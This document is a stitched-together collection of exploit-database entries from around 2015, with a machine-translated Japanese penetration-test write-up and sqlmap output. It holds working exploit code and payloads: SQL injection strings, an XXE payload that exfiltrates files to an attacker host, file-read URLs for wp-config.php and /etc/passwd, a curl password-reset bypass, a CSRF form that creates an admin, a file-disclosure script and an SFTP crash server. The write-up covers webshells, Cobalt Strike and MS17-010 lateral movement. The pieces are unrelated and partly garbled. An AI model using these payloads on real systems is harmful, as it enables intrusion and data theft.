[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:46:53
[09:46:53] [INFO] resuming back-end DBMS 'mysql'
[09:46:53] [INFO] testing connection to the target URL
[09:46:53] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: program (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: program=lol' AND (SELECT * FROM (SELECT(SLEEP(5)))yYCj) AND 'mQUB'='mQUB
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: program=lol' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x77775a6355684c45565a,0x7176717671),NULL,NULL,NULL,NULL,NULL,NULL#
---
[09:46:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0.12
[09:46:53] [INFO] fetching current user
current user: 'root@localhost'
[09:46:53] [INFO] testing if current user is DBA
[09:46:53] [INFO] fetching current user
[09:46:53] [WARNING] reflective value(s) found and filtering out
current user is DBA: True
[09:46:53] [INFO] fetched data logged to text files under '/root/.sqlmap/output/localhost'
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
| >>> THIS 'EXPLOIT' IS SHIT LIKE ALL OF HAK5 'SHOWS' <<< |
| <<< NOT TO BE (RE)PUBLISHED ON 1337DAY/INJ3CT0R >>> |
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
__
___________ ____ ____ _____ | | __ ___________
\____ \__ \ / \_/ ___\\__ \ | |/ // __ \_ __ \
| |_> > __ \| | \ \___ / __ \| <\ ___/| | \/
| __(____ /___| /\___ >____ /__|_ \\___ >__|
|__| \/ \/ \/ \/ \/ \/
.........................cant be pr0 without ascii art
#!/usr/bin/python
# libmimedir-free.py
#
# Libmimedir VCF Memory Corruption PoC (CVE-2015-3205)
#
# Jeremy Brown [jbrown3264/gmail]
# June 2015
#
# -Synopsis-
#
# Adding two NULL bytes to the end of a VCF file allows a user to manipulate free() calls
# which occur during it's lexer's memory clean-up procedure. This could lead to exploitable
# conditions such as crafting a specific memory chunk to allow for arbitrary code execution.
#
# -Tested-
#
# libmimedir-0.5.1.tar.gz
# libmimedir-static 0.4-13.fc21
#
# -Notes-
#
# Reported to Red Hat Bugzilla in May (1222251) and remains unfixed as of now. There's already
# a stale bug (1049214) to upgrade to latest upstream and there wasn't a movement to work on a
# fix with this one. yy_get_next_buffer() in dirlex.c would likely take the patch.
#
from struct import pack
def main():
mime = "begin:vcard<x\nx;type=x;type=x,"
mime += pack("<Q", 0x4141414141414141) # mdm->p
mime += pack("<Q", 0x4242424242424242) # mdm->next
mime += ":x>x.l:x"
mime += pack("<H", 0x0000) # 2 x YY_END_OF_BUFFER_CHAR
print("Writing free.vcf to local directory...")
try:
with open("free.vcf", 'wb') as outfile:
outfile.write(mime)
except Exception as error:
print("Error: %s\n" % error);
return
print("Done\n")
return
if __name__ == "__main__":
main()
# Exploit Title: HP WebInspect - XML External Entity
# Date: 23\04\2015
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: http://www.hp.com/
# Version: 10.4, 10.3, 10.2, 10.1, 10.0, 9.x, 8.x, 7.x
# CVE : CVE-2015-2125
1. Create website that exploits vulnerability.
1.1. Website that steals files using OOB technique:
1.1.1. Website that triggers vulnerability:
<html>
<body>
<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"http://attacker/file.xml">%25remote;%25int;%25trick;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>
</body>
</html>
1.1.2. file.xml file that is served on attacker's host. This file specifies which file should be retrieved from remote host and where content of that file should be sent:
<!ENTITY % payl SYSTEM "file:///C:/Windows/system.ini">
<!ENTITY % int "<!ENTITY % trick SYSTEM 'http://attacker/?p=%payl;'>">
1.2. Website that steals hashes of Administrator user:
1.2.1. Website that triggers vulnerability:
<html>
<body>
<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"\\attacker\path\file.txt">%25remote;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>
</body>
</html>
1.2.2. Attacker needs to start tool on the server that captures hashes.
2. Exploit is triggered while profiling or scanning created application using vulnerable versions of HP WebInspect.
# Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
# Google Dork: inurl:"/wp-content/plugins/robotcpa/"
# Date: 09.06.2015
# Exploit Author: T3N38R15
# Vendor Homepage: http://robot-cpa.good-info.co/
# Version: 5V
# Tested on: Windows (Firefox)
Linux (Firefox)
The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion.
We just need to base64 encode our injection.
Like that :
php://filter/resource=./../../../wp-config.php
cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==
or
file:///etc/passwd
ZmlsZTovLy9ldGMvcGFzc3dk
our injection look then like that :
http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
and we can see the content of the passwd file.
greets to Black Sniper
Regards T3N38R15
# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link:
https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux
Description:
proxy.php's code:
<?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>
Based on user input, the content of a file is printed out (unfortunately
not included) so any html file can be loaded, and an attacker may be able
to read any local file which
is not executed in the server.
Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
POC:
curl --silent --url
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
# Exploit Title: Wordpress History Collection <=1.1.1 Arbitraty File
Download
# Google Dork: inurl:plugins/history-collection
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/history-collection/
# Version: <=1.1.1
# Tested on: Linux
I-Description:
Wordpress history collection plugin contains a file called download.php
which is not filtering the GET input, it then uses this get input value to
force the download of a file.
(download.php, line 44):
header("Content-Disposition: attachment;
filename=\"".basename($filename)."\";" );
2:Proof of concept:
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=yourfile
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php
php -r "echo @file_get_contents('
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php')
;"
Greetz:
Moh Ooasiic, Virus Os, Black Sniper, T3N38R15, Green Ghost, n37_worm,
MuhmadEmad, redsm0ke
By Kuroi'SH
# Exploit Title: Authentication Bypass in Pandora FMS
# Google Dork:
intitle:"Pandora FMS - The Flexible Monitoring System"
intitle:"Pandora FMS - el Sistema Flexible de Monitorización"
# Date: 10/06/2015
# Exploit Author: Manuel Mancera (sinkmanu) | mmancera (at) a2secure (dot) com
# Vendor Homepage: http://pandorafms.com/ <http://pandorafms.com/>
# Software Link: http://pandorafms.com/ <http://pandorafms.com/>
# Version: 5.0, 5.1
# Vulnerability Type : Authentication Bypass
# Severity : High
### Description ###
A vulnerability has been discovered in Pandora FMS that permits an unautheticated user to change the password for any Pandora user without knowing the actual user password. The vulnerability occurs at the login screen due to the session not being checked before the password is changed.
### Proof of Concept ###
URL: /index.php
Method: POST
Payload: renew_password=1&login=admin
Payload2:
renew_password=1&login=admin&password_new=newpass&password_confirm=newpass
### Exploit ###
curl -d
"renew_password=1&login=admin&password_new=newpass&password_confirm=newpass"
http://localhost/index.php <http://localhost/index.php>
### Solution ###
Apply the latest patches available at the vendor website.
####################################################################
Disclaimer
--------------------
All information is provided without warranty. The intent is to provide
information to secure infrastructure and/or systems, not to be able to
attack or damage. Therefore A2Secure shall not be liable for any direct
or indirect damages that might be caused by using this information.
####################################################################
# Exploit Title: FiverrScript CSRF Vulnerability (add New admin)
# Author: Mahmoud Gamal (@Zombiehelp54)
# Google Dork: intext:Powered by FiverrScript
# Date: 10/06/2015
# Exploit Author: Scriptolution
# Vendor Homepage: http://scriptolution.com
# Software Link: http://fiverrscript.com
# Version: 7.2
# Tested on: Windows
FiverrScript is vulnerable to CSRF attack (No CSRF token in place) meaning
that if an admin user can be tricked to visit a crafted URL created by
attacker (via spear phishing/social engineering), a form will be submitted
to (http://localhost/fiverrscript/administrator/admins_create.php) that
will add a new user as administrator.
Once exploited, the attacker can login to the admin panel (
http://localhost/fiverrscript/administrator/index.php)
using the username and the password he posted in the form.
CSRF PoC Code
=============
<form action="http://localhost/fiverrscript/administrator/admins_create.php"
method="post" id="main_form" name="main_form"
enctype="multipart/form-data"><input type="hidden" id="submitform"
name="submitform" value="1">
<input type="hidden" name="username" value="attackerUsername">
<input type="hidden" name="password" value="attackerPreferedPW" >
<input type="hidden" name="email" value="attackeremail@something.com">
</form>
<script>
document.forms[0].submit();
</script>
Reported to script owner.
Security Level:
================
High
#!/usr/bin/python
import os
import sys
import socket
import binascii
'''
Title : GeoVision GeoHttpServer WebCams Remote File Disclosure Exploit
CVE-ID : none
Product : GeoVision
System : GeoHttpServer
Affected : 8.3.3.0 (may be more)
Impact : Critical
Remote : Yes
Website link: http://www.geovision.com.tw/
Reported : 10/06/2015
Author : Viktor Minin, minin.viktor@gmail.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
No authentication (login) is required to exploit this vulnerability.
The GeoVision GeoHttpServer application is prone to a remote file disclosure vulnerability.
An attacker can exploit this vulnerability to retrieve and download stored files on server such as 'boot.ini' and 'win.ini' by using a simple url request which made by browser.
'''
#os.system("cls")
os.system('title GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit');
os.system('color 2');
socket.setdefaulttimeout = 0.50
os.environ['no_proxy'] = '127.0.0.1,localhost'
CRLF = "\r\n"
def main():
print "#######################################################################"
print "# GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit"
print "# Usage: <ip> <port> <file>"
print "# Example: " +sys.argv[0]+ " 127.0.0.1 1337 windows\win.ini"
print "#######################################################################"
exit()
try:
url = sys.argv[1]
port = int(sys.argv[2])
#files = open(sys.argv[3],'r').read().split()
file = sys.argv[3]
except:
main()
def recvall(sock):
data = ""
part = None
while part != "":
part = sock.recv(4096)
data += part
return data
def request(url, port, pfile):
PATH = str(pfile)
HOST = url
PORT = port
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.connect((HOST, PORT))
sock.send("GET /...\...\\" + PATH + "%s HTTP/1.0\r\n\r\n" % (CRLF))
data = recvall(sock)
temp = data.split("\r\n\r\n")
sock.shutdown(1)
sock.close()
return temp[1]
ret = request(url, port, file)
hex = "".join("{:02x}".format(ord(c)) for c in ret)
bin = binascii.unhexlify(hex)
print ret
file = open(file.replace('\\', '_'),"wb")
file.write(bin)
file.close()
#~EOF
'''
# Exploit title: filezilla 3.11.0.2 sftp module denial of service vulnerability
# Date: 5-6-2015
# Vendor homepage: http://www.chiark.greenend.org.uk
# Software Link: http://dl.filehorse.com/win/file-transfer-and-networking/filezilla/FileZilla-3.11.0.2.exe?st=6b87ZegIN1LDhSGAw5M4wg&e=1434351489&fn=FileZilla_3.11.0.2_win32-setup.exe
# Version: 3.11.0.2
# Author: 3unnym00n
# Details:
# --------
# sftp module for filezilla based on putty's psftp component.
# when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the filezilla component crash
# Tested On: win7, xp
# operating steps: run the py, then execute : "D:\programfile\FileZilla FTP Client\filezilla.exe" sftp://root@127.0.0.1
'''
import socket
import struct
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.bind(('127.0.0.1', 22))
soc.listen(1)
client, addr = soc.accept()
## do banner exchange
## send server banner
client.send('SSH-2.0-SUCK\r\n')
## recv client banner
client_banner = ''
while True:
data = client.recv(1)
if data == '\x0a':
break
client_banner += data
print 'the client banner is: %s'%client_banner.__repr__()
## do key exchange
## recv client algorithms
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)
## send server algorithms
client.send('000001b4091464f9a91726b1efcfa98bed8e93bbd93d000000596469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000077373682d727361000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e6500000000000000000000000000000000000000000000'.decode('hex'))
## do dh key exchange
## recv dh group exchange request
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)
## send dh group exchange group
client.send('00000114081f0000010100c038282de061be1ad34f31325efe9b1d8520db14276ceb61fe3a2cb8d77ffe3b9a067505205bba8353847fd2ea1e2471e4294862a5d4c4f9a2b80f9da0619327cdbf2eb608b0b5549294a955972aa3512821b24782dd8ab97b53aab04b48180394abfbc4dcf9b819fc0cb5ac1275ac5f16ec378163501e4b27d49c67f660333888f1d503b96fa9c6c880543d8b5f04d70fe508ffca161798ad32015145b8e9ad43aab48ada81fd1e5a8ea7711a8ff57ec7c4c081b47fab0c2e9fa468e70dd6700f3412224890d5e99527a596ce635195f3a6d35e563bf4892df2c79c809704411018d919102d12cb112ce1e66ebf5db9f409f6c82a6a6e1e21e23532cf24a6e300000001020000000000000000'.decode('hex'))
## recv dh group exchange init
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)
## send dh group exchange reply
dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl
dh_gex_reply_msg += '\x09' ## padding len
dh_gex_reply_msg += '\x21' ## dh gex reply
dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len
dh_gex_reply_msg += 'A'*600
client.sendall(dh_gex_reply_msg)
0x01注入点が見つかりました
ストーリーの理由は、私があまりにもアイドル状態で、魚を捕まえるために仕事に行くからです。
触れたとき、特定のWebサイトのクエリボックスに触れました。
その後、古い問題が発生し、クエリを入力しました。
次に、1 'を入力します
TSK TSK、これは明らかにSQL注入です。
SQLMapアーティファクトを決定的に取り出します。
エンディングは完璧であり、注入だけでなく、DBAの許可もあります。
0x02ウェブサイトGet Shell
SQLインジェクションを使用してシェルを取得する一般的な方法がいくつかあります。 1つは、データを実行し、ディレクトリを介してWebサイト管理の背景を検索し、バックグラウンドを入力して、ファイルのアップロードを介してシェルを取得する方法を見つけるか、エラーレポート、PHPINFOインターフェイス、404インターフェイス、およびその他のメソッドを使用してWebサイトの絶対パスを知ることです。ただし、MySQLに比べて条件はまだ少し厳しいです。
それから私は剣を取り出し、ウェブサイトディレクトリをスキャンし始めました。
自由に管理者をクリックします
私は行ったところ、実際にはディレクトリトラバーサルがありました。
その後、00/をクリックしました
口いっぱいの古い血が噴出されました。これは始まる前に終わりましたか?
絶対的なパスは招かれず、実際に最も一般的なパスです。私は以前にそれを知っていました - 一般的なパスを実行するためにos -shell-
sqlmapに涙を浮かべて絶対的なパスを直接保持します-os-shell
ここに理解するポイントがあります。 MySQLデータベース-SQLMapのOS -ShellがSQLMAPを最初にファイルを書き込み、シェルTMPXXXX.PHPをアップロードし、ファイルを介してシェルアップロードコマンドをアップロードしてシェルTMPXXXX.PHPを実行し、コマンドを使用してシェル実行コマンドを実行します。
詳細については、Yujiujiuのブログにアクセスして学習できます。
https://www.cnblogs.com/rain99-/p/13755496.html
そこで、ここでは、SQLMAPファイルによってアップロードされたシェルを使用してシェルを直接アップロードしました。
ここにも問題があります、あなたはテンテイ・トロイの木馬でアサート関数を使用することはできません
最後に、私はトロイの木馬に変更して、シェルを正常に取りました
シェルを取得するプロセスは以前にあまりにも滑らかだったので、ディレクトリトラバーサルを注意深く見ませんでした。ただし、この記事を書くとき、ディレクトリのファイルトラバーサルを注意深く調べて、不正なアップロードポイントを正常に見つけました。つまり、不正なアップロード +ディレクトリトラバーサルを介してファイルアップロードフォルダーを見つけることができ、シェルを取得できます。
0x03予備情報収集
シェルを持っているので、最初のステップは情報を収集することです。
上記から、現在のユーザーは、イントラネット環境を備えたシステムとServer2012を備えたサーバーであり、キラーESET NOD32がインストールされていることがわかります。
次に、イントラネットのサバイバルマシンを見てみましょう。
NBTSCAN、ICMPプロトコル、ARPスキャン、スキャンラインなど、イントラネットの生存マシンを検出する方法はたくさんあります。ここでは、運用の利便性のために、操作前に直接オンラインになります。
シェルコードは、殺すことなく完全に起動されます
ここでは、K8GEGEラドンプラグインを使用してイントラネットをスキャンすると、メインスキャンの結果がより美しいです。
スキャン結果の一部を次に示します
イントラネットには多くの生き残ったホストがあることがわかります。このWebサーバーにはドメイン環境はありませんが、スキャン結果にはADなどの敏感な単語が含まれています。イントラネットには少なくとも2つのドメイン環境があると推定されています。現時点では、詳細情報収集が必要であり、イントラネットトポロジ図が描かれています。
0x04水平浸透さらに情報収集イントラネットの最初の波はMS17-010です。ここではK8gegeのラドンも使用します。
イントラネットには、MS17-010がある可能性のあるいくつかのマシンが実際にあることがわかります。ここで一つずつプレイするのは時間の無駄であり、主に不確実性があります。そのWebサーバーにはソフトキル入力ソフトウェアがインストールされており、イントラネットにもソフトキル入力ソフトウェアが必要なため、ドメイン内のホストである可能性のあるサーバーをターゲットにします。
その後、CSはソックスプロキシを開始し、MSFのプロキシを準備して戦いを開始します。
また、ローカルKALI仮想マシンにプロキシを掛けることは非常に簡単です。
sudo vim /etc/proxychains.conf
CSの行のIPを挿入し、下部に開いたポートを挿入します
Proxychains MSFConsoleでMSFを保存して開始します
その後、EXPがターゲットマシンに衝突したときに何かがうまくいかなかった。ソフトウェアを殺すマシンがインタラクティブな実行を傍受したはずです。そこで、一度に1つのコマンドのみをロードできるExpを見つけて、ユーザーを追加しました。
1か月前にこのスタンドを最後に見たときから、この記事を書いていたときに17010年を再現することに成功しませんでした。以前にターゲットマシンにアカウントを追加したため、ログインしてそれを見て、未知のda heikuoによってサーバーがランサムウェアに置かれていることがわかりました。
そのため、次の繁殖プロセスは継続せず、このイントラネットを後で見続けませんでした。
ドメイン環境の浸透の一般的なアイデアについて話しましょう:
まず、ターゲットマシンがドメイン環境にあるかどうかを判断します。ドメイン環境にある場合、
まず、オンラインでハッシュを読み取る権限を増やし、ドメイン管理アカウントを読み取ることができるかどうかを確認するか、ドメイン管理プロセスがあるかどうかを確認し、インジェクションを処理してからハッシュを渡してハッシュを介してドメイン制御を取得し、ドメイン内のすべてのハッシュをエクスポートします。
上記の方法が機能しない場合は、MS14-068、MS14-025、CVE-2020-1472などの一般的なドメイン特権を調達することもできます。
動作しない場合は、ドメイン内のWebまたは一般的なデバイスをスキャンし、デバイスの脆弱性またはWeb脆弱性から始めて、ドメイン制御マシンを段階的に段階的にします。
しかし、注意すべきことの1つは、イントラネットの浸透プロセス全体で、目標を明確にする必要があるということです。そうしないと、多くの時間が無駄になることです。同時に、あなたの思考は柔軟で変化しやすく、単一のポイントを握ろうとしないでください。
0x03要約
1。ターゲットサイトクエリに1 'を入力し、SQLエラーを表示します。 SQLインジェクション2がある場合があります。2。data.txtとしてBPを介してクエリのパケットキャプチャを保存し、SQLMAP -R data.txtを介して注入します。注入の脆弱性があり、データベースの許可がDBAであることがわかります。 3. Yujianディレクトリスキャンツールを使用して、ターゲットサイトディレクトリをスキャンし、管理者ディレクトリステータスがHTTP200。4であることを確認します。 00/エラーの報告など、Admin Directoryの下のフォルダーに自由にアクセスし、エラーがWebサイトの物理パスを表示します。 5。sqlmapの-os-shellパラメーターを介して文を書きます。6。アリの剣リンクを使用して文をリンクします。ディレクトリをチェックすると、/js/jqery_file_upload/に不正なアップロードポイントがあることがわかります。このアップロードポイントを介して、トロイの木馬をアップロードして、ディレクトリトラバーサルを介してアップロードされたファイルパスを見つけることができます。 7。ANTソードの仮想コマンド端子を介してIPアドレスをクエリし、システムプロセス(AVがあるかどうか)、システム情報およびパッチ情報IPConfig -168.1.34(ターゲットサイトイントラネットIPアドレス)タスクリスト/SVC ---- EKM.EXEおよびEGUIPROXY.EXE(EST NOD32 KILL)SystemINFO8。 VPSでコバルストライクを実行し、PSバックドアプログラムを生成し、バックドアの殺害を免除します(PowerShellを無料で使用することをお勧めします)。 Ant Swordを介してPSスクリプトをターゲットサイトサーバーにアップロードして実行し、オンラインで正常に進みます。 9。CSにdon.exeをアップロードし、Ladon 192.168.1.0/24 Osscanを使用してシステムバージョン10をスキャンします。同時に、Ladon 192.168.1.0/24 MS17-010も使用して永遠の青い脆弱性をスキャンし、複数のホストが存在することがわかりました。ローカルKALIの次の構成ファイルを使用して、socks5プロキシVim /etc/proxychains.confsocks4ターゲットIP:223313を追加します。 Webサーバーにはnod32がインターネットにインストールされているため、他のネットワークセグメントがあるはずです。 MS17-010を試してみると、成功しません。
出典:https://xz.aliyun.com/t/8586
source: https://www.securityfocus.com/bid/53641/info
The AZ Photo Album is prone to a cross-site-scripting and an arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input.
Attackers can exploit these issues to steal cookie information, execute arbitrary client side script code in the context of browser, upload and execute arbitrary files in the context of the webserver, and launch other attacks.
http://www.example.com/demo/php-photo-album-script/index.php/%F6%22%20onmouseover=document.write%28%22google.com%22%29%20
http://www.example.com/demo/php-photo-album-script/index.php/?gazpart=suggest